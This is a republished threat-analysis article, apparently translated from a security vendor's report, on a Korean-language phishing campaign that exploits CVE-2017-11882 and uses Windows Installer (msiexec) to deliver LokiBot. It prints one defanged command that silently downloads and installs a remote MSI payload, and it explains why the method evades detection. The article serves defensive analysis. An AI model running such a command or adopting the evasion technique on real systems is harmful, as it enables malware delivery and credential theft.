Shulou(Shulou.com)06/02 Report--

What is the use of Windows Installer, many novices are not very clear about this, in order to help you solve this problem, the following small series will explain in detail for everyone, there are people who need this to learn, I hope you can gain something.

More recently, we found that attackers have begun to exploit vulnerability CVE-2017-11882, but this time they are using an unusual installation method: through the Windows Installer service in Microsoft Windows operating systems. This is different from previous malware that used mshta.exe (for downloading and executing payloads) to run Powershell scripts and exploit vulnerabilities, which we found using msiexec.exe in the Windows Installer service.

infection chain

The following figure shows the infection chain of this attack technique:

The sample we analyzed appears to have come from a spam campaign. It first sends an email to the target user and asks the target user to confirm a bill payment, then "scares" the user in the email. The email was written in Korean and translated to something like: "Hello, your computer may have been infected with a virus or malware, please check it. In addition, the email contained an attachment titled "Payment copy.Doc"(labeled TROJ_CVE2017 - 11882.SM by Trend Micro), which contained the exploit code for vulnerability CVE-2017-11882.

The email content is shown below:

When the user opens the Word document, they will see something like this:

After successfully exploiting this vulnerability, an attacker would download and install a malicious MSI package named zus.msi via Windows Installer, running the following command:

Callcmd.exe /c msiexec /q /I "hxxps[:]//www[.] uwaoma[.] info/zus.msi

Msiexec downloads and installs a file called MSIFD83.tmp:

The installed MSIL code is as follows:

After download, Windows Installer (msiexec.exe) will continue to install a copy of MSIL or Delphi code on the system, which will be used as the loader for the actual Payload. Note that malicious packets also use a compression layer, so file scanning engines need to iterate or enumerate constantly to detect their maliciousness. However, it is difficult to identify its real Payload because its MSIL or Delphi code is highly obfuscated.

When run, the code enables a randomly named instance that replaces the malware Payload.

So far, we've found that attackers use this technique primarily to propagate LokiBot (TROJ_LOKI.SMA), but based on our analysis of its modules, it can also be used to propagate other payloads.

Below is a sample of the LokiBot variants we identified:

Why would an attacker need to use a new malicious Payload installation method?

Security products are increasingly efficient at detecting and monitoring programs like Wscript, Powershell, mshta.exe, Winword.exe, and others that attackers might use to install malicious payloads. Since these methods are already popular in cybercrime, their probability of detection has increased accordingly. However, using msiexec.exe to download malicious MSI packets is not the method most malware would use.

Although Andromeda botnets (ANDROM malware family) also use msiexec.exe, the installer is used differently from LokiBot because Andromeda injects malicious code into msiexec.exe to download payloads. In addition to this, Andromeda downloads and updates the Payload immediately after it downloads and executes a PE file. This method requires the MSI package used, which msiexec.exe recognizes as installable, so it also uses Windows Installer.

In fact, malware does not have to install itself through MSI packages, unlike most malware that uses msiexec.exe, the sample we analyzed did not require code modification, it uses Windows Installer to install malware.

Therefore, we believe that the reason why malware chooses to use this special installation method is mainly because malware developers have designed new security detection bypass methods.

mitigation programmes

Since the attack starts with phishing emails, users can mitigate the impact of this attack by defending against phishing emails. In addition, users must carefully read the wording of any text in the email when reading any email, and be careful if they find grammatical errors or other problems.

Did reading the above help you? If you still want to have further understanding of related knowledge or read more related articles, please pay attention to the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.